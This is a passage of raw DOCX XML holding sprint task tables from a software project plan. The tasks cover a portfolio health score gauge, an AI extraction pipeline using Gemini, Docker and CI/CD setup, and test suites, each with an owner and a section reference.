        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create HealthScoreResultDto and HealthScoreFactor</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Implement PortfolioHealthScoreService (6 factors)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§4.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add /api/portfoliohealth endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Create PortfolioHealthGaugeComponent (SVG radial gauge)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§4.1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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5.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Integrate gauge into dashboard.component.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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5.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add per-factor breakdown expandable section below gauge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§4.1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec10-6" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 6 — AI Upgrade (Weeks 11–12)</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1600"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Section Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create GeminiOrchestratorService with 5-step pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.x Enh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add confidence score to each extracted field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§4.x Enh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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6.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Update verification modal to show confidence badges</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.x Enh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add /api/policies/ask natural language endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§4.x Enh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create CommandPaletteComponent (Ctrl+K shortcut)</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.x Enh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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6.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add KeyboardShortcutService with shortcut registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§5.2 Enh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec10-7" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 7 — Infrastructure (Weeks 13–14)</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1600"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Section Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create backend Dockerfile (multi-stage build)</w:t>
            </w:r>
          </w:p>
        </w:tc>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§5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Create frontend Dockerfile (nginx serving)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create docker-compose.yml (api, frontend, db, redis, seq)</w:t>
            </w:r>
          </w:p>
        </w:tc>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§5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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7.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Create .github/workflows/ci-cd.yml pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Create xUnit test project with InMemory DB fixture</w:t>
            </w:r>
          </w:p>
        </w:tc>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§7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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7.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Write InvestmentForecastService test suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§7.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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7.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Write Auth integration tests</w:t>
            </w:r>
          </w:p>
        </w:tc>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§7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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7.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Set up Playwright and write policy CRUD e2e tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec10-8" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sprint 8 — Advanced Features &amp; Accessibility (Weeks 15–16)</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1600"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
